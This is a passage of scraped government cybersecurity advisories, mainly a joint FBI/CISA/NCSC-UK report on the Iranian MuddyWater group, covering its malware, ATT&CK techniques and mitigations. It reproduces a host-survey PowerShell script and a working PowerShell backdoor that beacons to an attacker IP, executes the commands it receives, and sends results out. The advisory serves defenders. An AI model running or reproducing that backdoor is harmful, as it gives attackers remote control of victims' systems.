[APT28](<https://attack.mitre.org/groups/G0007>), 18 October 2021. \n[22] Based on technical information shared by Mandiant. \n[23] MITRE Groups: [APT28](<https://attack.mitre.org/groups/G0007>), 18 October 2021. \n[24] MITRE Groups: [APT28](<https://attack.mitre.org/groups/G0007>), 18 October 2021. \n[25] MITRE Software: [Cobalt Strike](<https://attack.mitre.org/software/S0154/>), 18 October 2021. \n[26] MITRE Software: [Fysbis](<https://attack.mitre.org/software/S0410/>), 6 November 2020. \n[27] MITRE Software: [Koadic](<https://attack.mitre.org/software/S0250/>), 30 March 2020. \n[28] MITRE Groups: [APT28](<https://attack.mitre.org/groups/G0007>), 18 October 2021. \n[29] Based on technical information shared by Mandiant. \n[30] Based on technical information shared by Mandiant. \n[31] MITRE Groups: [APT28](<https://attack.mitre.org/groups/G0007>), 18 October 2021. \n[32] MITRE Groups: [APT28](<https://attack.mitre.org/groups/G0007>), 18 October 2021.\n\n### Revisions\n\nFebruary 16, 2022: Initial Version\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-16T12:00:00", "type": "ics", "title": "Russian State-Sponsored Cyber Actors Target Cleared Defense Contractor Networks to Obtain Sensitive U.S. Defense Information and Technology", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2020-0688", "CVE-2020-17144"], "modified": "2022-02-16T12:00:00", "id": "AA22-047A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-047a", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-03-14T18:28:18", "description": "### Summary\n\n**Actions to Take Today to Protect Against Malicious Activity** \n* Search for indicators of compromise. \n* Use antivirus software. \n* [Patch](<https://us-cert.cisa.gov/ncas/tips/ST04-006>) all systems. \n* Prioritize patching [known exploited vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>). \n* Train users to recognize and report [phishing attempts](<https://us-cert.cisa.gov/ncas/tips/ST04-014>). \n* Use [multi-factor authentication](<https://us-cert.cisa.gov/ncas/tips/ST05-012>).\n\n_**Note: **this advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&amp;CK\u00ae) framework, version 10. See the [ATT&amp;CK for Enterprise](<https://attack.mitre.org/versions/v10/techniques/enterprise/>) for all referenced threat actor tactics and techniques._\n\nThe Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), the U.S. Cyber Command Cyber National Mission Force (CNMF), and the United Kingdom\u2019s National Cyber Security Centre (NCSC-UK) have observed a group of Iranian government-sponsored advanced persistent threat (APT) actors, known as MuddyWater, conducting cyber espionage and other malicious cyber operations targeting a range of government and private-sector organizations across sectors\u2014including telecommunications, defense, local government, and oil and natural gas\u2014in Asia, Africa, Europe, and North America. **Note:** MuddyWater is also known as Earth Vetala, MERCURY, Static Kitten, Seedworm, and TEMP.Zagros.\n\nMuddyWater is a subordinate element within the Iranian Ministry of Intelligence and Security (MOIS).[[1](<https://www.cybercom.mil/Media/News/Article/2897570/iranian-intel-cyber-suite-of-malware-uses-open-source-tools/>)] This APT group has conducted broad cyber campaigns in support of MOIS objectives since approximately 2018. MuddyWater actors are positioned both to provide stolen data and accesses to the Iranian government and to share these with other malicious cyber actors.\n\nMuddyWater actors are known to exploit publicly reported vulnerabilities and use open-source tools and strategies to gain access to sensitive data on victims\u2019 systems and deploy ransomware. These actors also maintain persistence on victim networks via tactics such as side-loading dynamic link libraries (DLLs)\u2014to trick legitimate programs into running malware\u2014and obfuscating PowerShell scripts to hide command and control (C2) functions. FBI, CISA, CNMF, and NCSC-UK have observed MuddyWater actors recently using various malware\u2014variants of PowGoop, Small Sieve, Canopy (also known as Starwhale), Mori, and POWERSTATS\u2014along with other tools as part of their malicious activity. \n\nThis advisory provides observed tactics, techniques, and procedures (TTPs); malware; and indicators of compromise (IOCs) associated with this Iranian government-sponsored APT activity to aid organizations in the identification of malicious activity against sensitive networks. \n\nFBI, CISA, CNMF, NCSC-UK, and the National Security Agency (NSA) recommend organizations apply the mitigations in this advisory and review the following resources for additional information. **Note:** also see the Additional Resources section.\n\n * Malware Analysis Report \u2013 [MAR-10369127-1.v1: MuddyWater](<https://www.cisa.gov/uscert/ncas/analysis-reports/ar22-055a>)\n * IOCs \u2013 AA22-052A.stix and MAR-10369127-1.v1.stix\n * CISA's webpage \u2013 [Iran Cyber Threat Overview and Advisories](<https://www.cisa.gov/uscert/iran>)\n * [NCSC-UK MAR \u2013 Small Sieve](<https://www.ncsc.gov.uk/files/NCSC-Malware-Analysis-Report-Small-Sieve.pdf>)\n * [CNMF's press release \u2013 Iranian intel cyber suite of malware uses open source tools](<https://www.cybercom.mil/Media/News/Article/2897570/iranian-intel-cyber-suite-of-malware-uses-open-source-tools/>)\n\nClick here for a PDF version of this report.\n\n### Technical Details\n\nFBI, CISA, CNMF, and NCSC-UK have observed the Iranian government-sponsored MuddyWater APT group employing spearphishing, exploiting publicly known vulnerabilities, and leveraging multiple open-source tools to gain access to sensitive government and commercial networks. \n\nAs part of its spearphishing campaign, MuddyWater attempts to coax their targeted victim into downloading ZIP files, containing either an Excel file with a malicious macro that communicates with the actor\u2019s C2 server or a PDF file that drops a malicious file to the victim\u2019s network [[T1566.001](<https://attack.mitre.org/versions/v10/techniques/T1566/001/>), [T1204.002](<https://attack.mitre.org/versions/v10/techniques/T1204/002>)]. MuddyWater actors also use techniques such as side-loading DLLs [[T1574.002](<https://attack.mitre.org/versions/v10/techniques/T1574/002/>)] to trick legitimate programs into running malware and obfuscating PowerShell scripts [[T1059.001](<https://attack.mitre.org/versions/v10/techniques/T1059/001/>)] to hide C2 functions [[T1027](<https://attack.mitre.org/versions/v10/techniques/T1027/>)] (see the PowGoop section for more information). \n\nAdditionally, the group uses multiple malware sets\u2014including PowGoop, Small Sieve, Canopy/Starwhale, Mori, and POWERSTATS\u2014for loading malware, backdoor access, persistence [[TA0003](<https://attack.mitre.org/versions/v10/tactics/TA0003/>)], and exfiltration [[TA0010](<https://attack.mitre.org/versions/v10/tactics/TA0010/>)]. See below for descriptions of some of these malware sets, including newer tools or variants to the group\u2019s suite. Additionally, see Malware Analysis Report [MAR-10369127.r1.v1: MuddyWater](<https://www.cisa.gov/uscert/ncas/analysis-reports/ar22-055a>) for further details.\n\n#### **PowGoop**\n\nMuddyWater actors use new variants of PowGoop malware as their main loader in malicious operations; it consists of a DLL loader and a PowerShell-based downloader. The malicious file impersonates a legitimate file that is signed as a Google Update executable file.\n\nAccording to samples of PowGoop analyzed by [CISA](<https://www.cisa.gov/uscert/ncas/analysis-reports/ar22-055a>) and [CNMF](<https://www.cybercom.mil/Media/News/Article/2897570/iranian-intel-cyber-suite-of-malware-uses-open-source-tools/>), PowGoop consists of three components:\n\n * A DLL file renamed as a legitimate filename, `Goopdate.dll`, to enable the DLL side-loading technique [[T1574.002](<https://attack.mitre.org/versions/v10/techniques/T1574/002/>)]. The DLL file is contained within an executable, `GoogleUpdate.exe`. \n * A PowerShell script, obfuscated as a .dat file, `goopdate.dat`, used to decrypt and run a second obfuscated PowerShell script, `config.txt` [[T1059.001](<https://attack.mitre.org/versions/v10/techniques/T1059/001/>)].\n * `config.txt`, an encoded, obfuscated PowerShell script containing a beacon to a hardcoded IP address.\n\nThese components retrieve encrypted commands from a C2 server. The DLL file hides communications with MuddyWater C2 servers by executing with the Google Update service. \n\n#### **Small Sieve**\n\nAccording to a sample [analyzed by NCSC-UK](<https://www.ncsc.gov.uk/files/NCSC-Malware-Analysis-Report-Small-Sieve.pdf>), Small Sieve is a simple Python [[T1059.006](<https://attack.mitre.org/versions/v10/techniques/T1059/006/>)] backdoor distributed using a Nullsoft Scriptable Install System (NSIS) installer, `gram_app.exe`. The NSIS installs the Python backdoor, `index.exe`, and adds it as a registry run key [[T1547.001](<https://attack.mitre.org/versions/v10/techniques/T1547/001/>)], enabling persistence [[TA0003](<https://attack.mitre.org/versions/v10/tactics/TA0003/>)]. \n\nMuddyWater disguises malicious executables and uses filenames and Registry key names associated with Microsoft's Windows Defender to avoid detection during casual inspection. The APT group has also used variations of Microsoft (e.g., \"Microsift\") and Outlook in its filenames associated with Small Sieve [[T1036.005](<https://attack.mitre.org/versions/v10/techniques/T1036/005/>)].\n\nSmall Sieve provides basic functionality required to maintain and expand a foothold in victim infrastructure and avoid detection [[TA0005](<https://attack.mitre.org/versions/v10/tactics/TA0005/>)] by using custom string and traffic obfuscation schemes together with the Telegram Bot application programming interface (API). Specifically, Small Sieve\u2019s beacons and taskings are performed using Telegram API over Hypertext Transfer Protocol Secure (HTTPS) [[T1071.001](<https://attack.mitre.org/versions/v10/techniques/T1071/001>)], and the tasking and beaconing data is obfuscated through a hex byte swapping encoding scheme combined with an obfuscated Base64 function [[T1027](<https://attack.mitre.org/versions/v10/techniques/T1027>)], [T1132.002](<https://attack.mitre.org/versions/v10/techniques/T1132/002/>)].\n\n**Note:** cybersecurity agencies in the United Kingdom and the United States attribute Small Sieve to MuddyWater with high confidence. \n\nSee Appendix B for further analysis of Small Sieve malware.\n\n#### **Canopy**\n\nMuddyWater also uses Canopy/Starwhale malware, likely distributed via spearphishing emails with targeted attachments [[T1566.001](<https://attack.mitre.org/versions/v10/techniques/T1566/001>)]. According to two Canopy/Starwhale samples analyzed by CISA, Canopy uses Windows Script File (.wsf) scripts distributed by a malicious Excel file. **Note:** the cybersecurity agencies of the United Kingdom and the United States attribute these malware samples to MuddyWater with high confidence. \n\nIn the samples CISA analyzed, a malicious Excel file, `Cooperation terms.xls`, contained macros written in Visual Basic for Applications (VBA) and two encoded Windows Script Files. When the victim opens the Excel file, they receive a prompt to enable macros [[T1204.002](<https://attack.mitre.org/versions/v10/techniques/T1204/002/>)]. Once this occurs, the macros are executed, decoding and installing the two embedded Windows Script Files.\n\nThe first .wsf is installed in the current user startup folder [[T1547.001](<https://attack.mitre.org/versions/v10/techniques/T1547/001/>)] for persistence. The file contains hexadecimal (hex)-encoded strings that have been reshuffled [[T1027](<https://attack.mitre.org/versions/v10/techniques/T1027/>)]. The file executes a command to run the second .wsf.\n\nThe second .wsf also contains hex-encoded strings that have been reshuffled. This file collects [[TA0035](<https://attack.mitre.org/versions/v10/tactics/TA0035/>)] the victim system\u2019s IP address, computer name, and username [[T1005](<https://attack.mitre.org/versions/v10/techniques/T1005/>)]. The collected data is then hex-encoded and sent to an adversary-controlled IP address, `http[:]88.119.170[.]124`, via an HTTP POST request [[T1041](<https://attack.mitre.org/versions/v10/techniques/T1041/>)].\n\n#### **Mori**\n\nMuddyWater also uses the Mori backdoor that uses Domain Name System tunneling to communicate with the group\u2019s C2 infrastructure [[T1572](<https://attack.mitre.org/versions/v10/techniques/T1572/>)]. \n\nAccording to one sample analyzed by CISA, `FML.dll`, Mori uses a DLL written in C++ that is executed with `regsvr32.exe` with export `DllRegisterServer`; this DLL appears to be a component to another program. `FML.dll` contains approximately 200MB of junk data [[T1001.001](<https://attack.mitre.org/versions/v10/techniques/T1001/001/>)] in a resource directory 205, number 105. Upon execution, `FML.dll` creates a mutex, `0x50504060`, and performs the following tasks:\n\n * Deletes the file `FILENAME.old` and deletes file by registry value. The filename is the DLL file with a `.old` extension.\n * Resolves networking APIs from strings that are ADD-encrypted with the key` 0x05`.\n * Uses Base64 and Java Script Object Notation (JSON) based on certain key values passed to the JSON library functions. It appears likely that JSON is used to serialize C2 commands and/or their results.\n * Communicates using HTTP over either IPv4 or IPv6, depending on the value of an unidentified flag, for C2 [[T1071.001](<https://attack.mitre.org/versions/v10/techniques/T1071/001/>)].\n * Reads and/or writes data from the following Registry Keys, `HKLM\\Software\\NFC\\IPA` and `HKLM\\Software\\NFC\\(Default)`.\n\n#### **POWERSTATS**\n\nThis group is also known to use the POWERSTATS backdoor, which runs PowerShell scripts to maintain persistent access to the victim systems [[T1059.001](<https://attack.mitre.org/versions/v10/techniques/T1059>)]. \n\nCNMF has posted samples further detailing the different parts of MuddyWater\u2019s new suite of tools\u2014 along with JavaScript files used to establish connections back to malicious infrastructure\u2014to the malware aggregation tool and repository, [Virus Total](<http://www.virustotal.com/en/user/CYBERCOM_Malware_Alert>). Network operators who identify multiple instances of the tools on the same network should investigate further as this may indicate the presence of an Iranian malicious cyber actor.\n\nMuddyWater actors are also known to exploit unpatched vulnerabilities as part of their targeted operations. FBI, CISA, CNMF, and NCSC-UK have observed this APT group recently exploiting the Microsoft Netlogon elevation of privilege vulnerability ([CVE-2020-1472](<https://vulners.com/cve/CVE-2020-1472>)) and the Microsoft Exchange memory corruption vulnerability ([CVE-2020-0688](<https://vulners.com/cve/CVE-2020-0688>)). See [CISA\u2019s Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) for additional vulnerabilities with known exploits and joint Cybersecurity Advisory: [Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities](<https://www.cisa.gov/uscert/ncas/alerts/aa21-321a>) for additional Iranian APT group-specific vulnerability exploits.\n\n#### **Survey Script**\n\nThe following script is an example of a survey script used by MuddyWater to enumerate information about victim computers. It queries the Windows Management Instrumentation (WMI) service to obtain information about the compromised machine to generate a string, with these fields separated by a delimiter (e.g., `;;` in this sample). The produced string is usually encoded by the MuddyWater implant and sent to an adversary-controlled IP address.\n\n$O = Get-WmiObject Win32_OperatingSystem;$S = $O.Name;$S += \";;\";$ips = \"\";Get-WmiObject Win32_NetworkAdapterConfiguration -Filter \"IPEnabled=True\" | % {$ips = $ips + \", \" + $_.IPAddress[0]};$S += $ips.substring(1);$S += \";;\";$S += $O.OSArchitecture;$S += \";;\";$S += [System.Net.DNS]::GetHostByName('').HostName;$S += \";;\";$S += ((Get-WmiObject Win32_ComputerSystem).Domain);$S += \";;\";$S += $env:UserName;$S += \";;\";$AntiVirusProducts = Get-WmiObject -Namespace \"root\\SecurityCenter2\" -Class AntiVirusProduct -ComputerName $env:computername;$resAnti = @();foreach($AntiVirusProduct in $AntiVirusProducts){$resAnti += $AntiVirusProduct.displayName};$S += $resAnti;echo $S;\n\n#### **Newly Identified PowerShell Backdoor**\n\nThe newly identified PowerShell backdoor used by MuddyWater below uses a single-byte Exclusive-OR (XOR) to encrypt communications with the key 0x02 to adversary-controlled infrastructure. The script is lightweight in functionality and uses the InvokeScript method to execute responses received from the adversary.\n\nfunction encode($txt,$key){$enByte = [Text.Encoding]::UTF8.GetBytes($txt);for($i=0; $i -lt $enByte.count ; $i++){$enByte[$i] = $enByte[$i] -bxor $key;}$encodetxt = [Convert]::ToBase64String($enByte);return $encodetxt;}function decode($txt,$key){$enByte = [System.Convert]::FromBase64String($txt);for($i=0; $i -lt $enByte.count ; $i++){$enByte[$i] = $enByte[$i] -bxor $key;}$dtxt = [System.Text.Encoding]::UTF8.GetString($enByte);return $dtxt;}$global:tt=20;while($true){try{$w = [System.Net.HttpWebRequest]::Create('http://95.181.161.49:80/index.php?id=&lt;victim identifier&gt;');$w.proxy = [Net.WebRequest]::GetSystemWebProxy();$r=(New-Object System.IO.StreamReader($w.GetResponse().GetResponseStream())).ReadToEnd();if($r.Length -gt 0){$res=[string]$ExecutionContext.InvokeCommand.InvokeScript(( decode $r 2));$wr = [System.Net.HttpWebRequest]::Create('http://95.181.161.49:80/index.php?id=&lt;victim identifier&gt;');$wr.proxy = [Net.WebRequest]::GetSystemWebProxy();$wr.Headers.Add('cookie',(encode $res 2));$wr.GetResponse().GetResponseStream();}}catch {}Start-Sleep -Seconds $global:tt;}\n\n### MITRE ATT&amp;CK Techniques\n\n[MuddyWater](<https://attack.mitre.org/groups/G0069/>) uses the ATT&amp;CK techniques listed in table 1.\n\n_Table 1: MuddyWater ATT&amp;CK Techniques[[2](<https://attack.mitre.org/versions/v10/groups/G0069/>)]_\n\nTechnique Title | **ID** | **Use** \n---|---|--- \n**Reconnaissance** \nGather Victim Identity Information: Email Addresses | [T1589.002](<https://attack.mitre.org/versions/v10/techniques/T1589/002>) | MuddyWater has specifically targeted government agency employees with spearphishing emails. \n**Resource Development** \nAcquire Infrastructure: Web Services | [T1583.006](<https://attack.mitre.org/versions/v10/techniques/T1583/006/>) | MuddyWater has used file sharing services including OneHub to distribute tools. \nObtain Capabilities: Tool | [T1588.002](<https://attack.mitre.org/versions/v10/techniques/T1588/002>) | MuddyWater has made use of legitimate tools ConnectWise and RemoteUtilities for access to target environments. \n**Initial Access** \nPhishing: Spearphishing Attachment | [T1566.001](<https://attack.mitre.org/versions/v10/techniques/T1566/001>) | MuddyWater has compromised third parties and used compromised accounts to send spearphishing emails with targeted attachments. \nPhishing: Spearphishing Link | [T1566.002](<https://attack.mitre.org/versions/v10/techniques/T1566/002>) | MuddyWater has sent targeted spearphishing emails with malicious links. \n**Execution** \nWindows Management Instrumentation | [T1047](<https://attack.mitre.org/versions/v10/techniques/T1047>) | MuddyWater has used malware that leveraged Windows Management Instrumentation for execution and querying host information. \nCommand and Scripting Interpreter: PowerShell | [T1059.001](<https://attack.mitre.org/versions/v10/techniques/T1059/001/>) | MuddyWater has used PowerShell for execution. \nCommand and Scripting Interpreter: Windows Command Shell | [1059.003](<https://attack.mitre.org/versions/v10/techniques/T1059/003>) | MuddyWater has used a custom tool for creating reverse shells. \nCommand and Scripting Interpreter: Visual Basic | [T1059.005](<https://attack.mitre.org/versions/v10/techniques/T1059/005>) | MuddyWater has used Virtual Basic Script (VBS) files to execute its POWERSTATS payload, as well as macros. \nCommand and Scripting Interpreter: Python | [T1059.006](<https://attack.mitre.org/versions/v10/techniques/T1059/006>) | MuddyWater has used developed tools in Python including Out1. \nCommand and Scripting Interpreter: JavaScript | [T1059.007](<https://attack.mitre.org/versions/v10/techniques/T1059/007>) | MuddyWater has used JavaScript files to execute its POWERSTATS payload. \nExploitation for Client Execution | [T1203](<https://attack.mitre.org/versions/v10/techniques/T1203>) | MuddyWater has exploited the Office vulnerability CVE-2017-0199 for execution. \nUser Execution: Malicious Link | [T1204.001](<https://attack.mitre.org/versions/v10/techniques/T1204/001>) | MuddyWater has distributed URLs in phishing emails that link to lure documents. \nUser Execution: Malicious File | [T1204.002](<https://attack.mitre.org/versions/v10/techniques/T1204/002>) | MuddyWater has attempted to get users to enable macros and launch malicious Microsoft Word documents delivered via spearphishing emails. \nInter-Process Communication: Component Object Model | [T1559.001](<https://attack.mitre.org/versions/v10/techniques/T1559/001>) | MuddyWater has used malware that has the capability to execute malicious code via COM, DCOM, and Outlook. \nInter-Process Communication: Dynamic Data Exchange | [T1559.002](<https://attack.mitre.org/versions/v10/techniques/T1559/002>) | MuddyWater has used malware that can execute PowerShell scripts via Dynamic Data Exchange. \n**Persistence** \nScheduled Task/Job: Scheduled Task | [T1053.005](<https://attack.mitre.org/versions/v10/techniques/T1053/005>) | MuddyWater has used scheduled tasks to establish persistence. \nOffice Application Startup: Office Template Macros | [T1137.001](<https://attack.mitre.org/versions/v10/techniques/T1137/001>) | MuddyWater has used a Word Template, `Normal.dotm`, for persistence. \nBoot or Logon Autostart Execution: Registry Run Keys / Startup Folder | [T1547.001](<https://attack.mitre.org/versions/v10/techniques/T1547/001/>) | MuddyWater has added Registry Run key `KCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\SystemTextEncoding` to establish persistence. \n**Privilege Escalation** \nAbuse Elevation Control Mechanism: Bypass User Account Control | [T1548.002](<https://attack.mitre.org/versions/v10/techniques/T1548/002/>) | MuddyWater uses various techniques to bypass user account control. \nCredentials from Password Stores | [T1555](<https://attack.mitre.org/versions/v10/techniques/T1555>) | MuddyWater has performed credential dumping with LaZagne and other tools, including by dumping passwords saved in victim email. \nCredentials from Web Browsers | \n\n[T1555.003](<https://attack.mitre.org/versions/v10/techniques/T1055/003>)\n\n| MuddyWater has run tools including Browser64 to steal passwords saved in victim web browsers. \n**Defense Evasion** \nObfuscated Files or Information | [T1027](<https://attack.mitre.org/versions/v10/techniques/T1027>) | MuddyWater has used Daniel Bohannon\u2019s Invoke-Obfuscation framework and obfuscated PowerShell scripts. The group has also used other obfuscation methods, including Base64 obfuscation of VBScripts and PowerShell commands. \nSteganography | [T1027.003](<https://attack.mitre.org/versions/v10/techniques/T1027/003>) | MuddyWater has stored obfuscated JavaScript code in an image file named `temp.jpg`. \nCompile After Delivery | [T1027.004](<https://attack.mitre.org/versions/v10/techniques/T1027/004>) | MuddyWater has used the` .NET` `csc.exe` tool to compile executables from downloaded C# code. \nMasquerading: Match Legitimate Name or Location | [T1036.005](<https://attack.mitre.org/versions/v10/techniques/T1036/005>) | MuddyWater has disguised malicious executables and used filenames and Registry key names associated with Windows Defender. E.g., Small Sieve uses variations of Microsoft (Microsift) and Outlook in its filenames to attempt to avoid detection during casual inspection. \nDeobfuscate/Decode Files or Information | \n\n[T1140](<https://attack.mitre.org/versions/v10/techniques/T1140>)\n\n| MuddyWater decoded Base64-encoded PowerShell commands using a VBS file. \nSigned Binary Proxy Execution: CMSTP | \n\n[T1218.003](<https://attack.mitre.org/versions/v10/techniques/T1218/003>)\n\n| MuddyWater has used `CMSTP.exe` and a malicious `.INF` file to execute its POWERSTATS payload. \nSigned Binary Proxy Execution: Mshta | [T1218.005](<https://attack.mitre.org/versions/v10/techniques/T1218/005>) | MuddyWater has used `mshta.exe` to execute its POWERSTATS payload and to pass a PowerShell one-liner for execution. \nSigned Binary Proxy Execution: Rundll32 | [T1218.011](<https://attack.mitre.org/versions/v10/techniques/T1218/011>) | MuddyWater has used malware that leveraged `rundll32.exe` in a Registry Run key to execute a `.dll`. \nExecution Guardrails | [T1480](<https://attack.mitre.org/versions/v10/techniques/T1480/>) | The Small Sieve payload used by MuddyWater will only execute correctly if the word \u201cPlatypus\u201d is passed to it on the command line. \nImpair Defenses: Disable or Modify Tools | [T1562.001](<https://attack.mitre.org/versions/v10/techniques/T1562/001>) | MuddyWater can disable the system's local proxy settings. \n**Credential Access** \nOS Credential Dumping: LSASS Memory | [T1003.001](<https://attack.mitre.org/versions/v10/techniques/T1003/001>) | MuddyWater has performed credential dumping with Mimikatz and `procdump64.exe`. \nOS Credential Dumping: LSA Secrets | \n\n[T1003.004](<https://attack.mitre.org/versions/v10/techniques/T1003/004>)\n\n| MuddyWater has performed credential dumping with LaZagne. \nOS Credential Dumping: Cached Domain Credentials | [T1003.005](<https://attack.mitre.org/versions/v10/techniques/T1003/005>) | MuddyWater has performed credential dumping with LaZagne. \nUnsecured Credentials: Credentials In Files | \n\n[T1552.001](<https://attack.mitre.org/versions/v10/techniques/T1552/001>)\n\n| MuddyWater has run a tool that steals passwords saved in victim email. \n**Discovery** \nSystem Network Configuration Discovery | [T1016](<https://attack.mitre.org/versions/v10/techniques/T1016>) | MuddyWater has used malware to collect the victim\u2019s IP address and domain name. \nSystem Owner/User Discovery | [T1033](<https://attack.mitre.org/versions/v10/techniques/T1033>) | MuddyWater has used malware that can collect the victim\u2019s username. \nSystem Network Connections Discovery | [T1049](<https://attack.mitre.org/versions/v10/techniques/T1049>) | MuddyWater has used a PowerShell backdoor to check for Skype connections on the target machine. \nProcess Discovery | [T1057](<https://attack.mitre.org/versions/v10/techniques/T1057>) | MuddyWater has used malware to obtain a list of running processes on the system. \nSystem Information Discovery | \n\n[T1082](<https://attack.mitre.org/versions/v10/techniques/T1082>)\n\n| MuddyWater has used malware that can collect the victim\u2019s OS version and machine name. \nFile and Directory Discovery | [T1083](<https://attack.mitre.org/versions/v10/techniques/T1083>) | MuddyWater has used malware that checked if the ProgramData folder had folders or files with the keywords \"Kasper,\" \"Panda,\" or \"ESET.\" \nAccount Discovery: Domain Account | [T1087.002](<https://attack.mitre.org/versions/v10/techniques/T1087/002/>) | MuddyWater has used `cmd.exe` net user/domain to enumerate domain users. \nSoftware Discovery | [T1518](<https://attack.mitre.org/versions/v10/techniques/T1518>) | MuddyWater has used a PowerShell backdoor to check for Skype connectivity on the target machine. \nSecurity Software Discovery | [T1518.001](<https://attack.mitre.org/versions/v10/techniques/T1518/001>) | MuddyWater has used malware to check running processes against a hard-coded list of security tools often used by malware researchers. \n**Collection** \nScreen Capture | [T1113](<https://attack.mitre.org/versions/v10/techniques/T1113>) | MuddyWater has used malware that can capture screenshots of the victim\u2019s machine. \n \nArchive Collected Data: Archive via Utility\n\n| [T1560.001](<https://attack.mitre.org/versions/v10/techniques/T1560/001/>) | MuddyWater has used the native Windows cabinet creation tool, `makecab.exe`, likely to compress stolen data to be uploaded. \n**Command and Control** \nApplication Layer Protocol: Web Protocols | [T1071.001](<https://attack.mitre.org/versions/v10/techniques/T1071/001/>) | MuddyWater has used HTTP for C2 communications. e.g., Small Sieve beacons and tasking are performed using the Telegram API over HTTPS. \nProxy: External Proxy | [T1090.002](<https://attack.mitre.org/versions/v10/techniques/T1090/002>) | \n\nMuddyWater has controlled POWERSTATS from behind a proxy network to obfuscate the C2 location. \n\nMuddyWater has used a series of compromised websites that victims connected to randomly to relay information to C2. \n \nWeb Service: Bidirectional Communication | [T1102.002](<https://attack.mitre.org/versions/v10/techniques/T1102/002>) | MuddyWater has used web services including OneHub to distribute remote access tools. \nMulti-Stage Channels | [T1104](<https://attack.mitre.org/versions/v10/techniques/T1104>) | MuddyWater has used one C2 to obtain enumeration scripts and monitor web logs, but a different C2 to send data back. \nIngress Tool Transfer | [T1105](<https://attack.mitre.org/versions/v10/techniques/T1105>) | MuddyWater has used malware that can upload additional files to the victim\u2019s machine. \nData Encoding: Standard Encoding | [T1132.001](<https://attack.mitre.org/versions/v10/techniques/T1132/001/>) | MuddyWater has used tools to encode C2 communications including Base64 encoding. \nData Encoding: Non-Standard Encoding | [T1132.002](<https://attack.mitre.org/versions/v10/techniques/T1132/002/>) | MuddyWater uses tools such as Small Sieve, which employs a custom hex byte swapping encoding scheme to obfuscate tasking traffic. \nRemote Access Software | [T1219](<https://attack.mitre.org/versions/v10/techniques/T1219>) | MuddyWater has used a legitimate application, ScreenConnect, to manage systems remotely and move laterally. \n**Exfiltration** \nExfiltration Over C2 Channel | [T1041](<https://attack.mitre.org/versions/v10/techniques/T1041>) | MuddyWater has used C2 infrastructure to receive exfiltrated data. \n \n### Mitigations\n\n#### Protective Controls and Architecture\n\n * **Deploy application control software to limit the applications and executable code that can be run by users. **Email attachments and files downloaded via links in emails often contain executable code. \n\n#### Identity and Access Management\n\n * **Use multifactor authentication where possible,** particularly for webmail, virtual private networks, and accounts that access critical systems. \n * **Limit the use of administrator privileges.** Users who browse the internet, use email, and execute code with administrator privileges make for excellent spearphishing targets because their system\u2014once infected\u2014enables attackers to move laterally across the network, gain additional accesses, and access highly sensitive information. \n\n#### Phishing Protection\n\n * **Enable antivirus and anti-malware software and update signature definitions in a timely manner.** Well-maintained antivirus software may prevent use of commonly deployed attacker tools that are delivered via spearphishing. \n * **Be suspicious of unsolicited contact via email or social media from any individual you do not know personally.** Do not click on hyperlinks or open attachments in these communications.\n * **Consider adding an email banner to emails received from outside your organization and disabling hyperlinks in received emails.**\n * **Train users through awareness and simulations to recognize and report phishing and social engineering attempts.** Identify and suspend access of user accounts exhibiting unusual activity.\n * **Adopt threat reputation services at the network device, operating system, application, and email service levels. **Reputation services can be used to detect or prevent low-reputation email addresses, files, URLs, and IP addresses used in spearphishing attacks. \n\n#### Vulnerability and Configuration Management\n\n * **Install updates/patch operating systems, software, and firmware as soon as updates/patches are released. **Prioritize patching [known exploited vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>).\n\n### Additional Resources\n\n * For more information on Iranian government-sponsored malicious cyber activity, see [CISA's webpage \u2013 Iran Cyber Threat Overview and Advisories](<https://www.us-cert.cisa.gov/iran>) and [CNMF's press release \u2013 Iranian intel cyber suite of malware uses open source tools](<https://www.cybercom.mil/Media/News/Article/2897570/iranian-intel-cyber-suite-of-malware-uses-open-source-tools/>). \n * For information and resources on protecting against and responding to ransomware, refer to [StopRansomware.gov](<https://www.cisa.gov/stopransomware/>), a centralized, whole-of-government webpage providing ransomware resources and alerts.\n * The joint advisory from the cybersecurity authorities of Australia, Canada, New Zealand, the United Kingdom, and the United States: [Technical Approaches to Uncovering and Remediating Malicious Activity](<https://us-cert.cisa.gov/sites/default/files/publications/AA20-245A-Joint_CSA-Technical_Approaches_to_Uncovering_Malicious_Activity_508.pdf>) provides additional guidance when hunting or investigating a network and common mistakes to avoid in incident handling.\n * CISA offers a range of no-cost [cyber hygiene services](<https://www.cisa.gov/cyber-hygiene-services>) to help critical infrastructure organizations assess, identify, and reduce their exposure to threats, including ransomware. By requesting these services, organizations of any size could find ways to reduce their risk and mitigate attack vectors.\n * The U.S. Department of State\u2019s Rewards for Justice (RFJ) program offers a reward of up to $10 million for reports of foreign government malicious activity against U.S. critical infrastructure. See the [RFJ](<https://rewardsforjustice.net/rewards/foreign-malicious-cyber-activity-against-u-s-critical-infrastructure/>) website for more information and how to report information securely.\n\n### 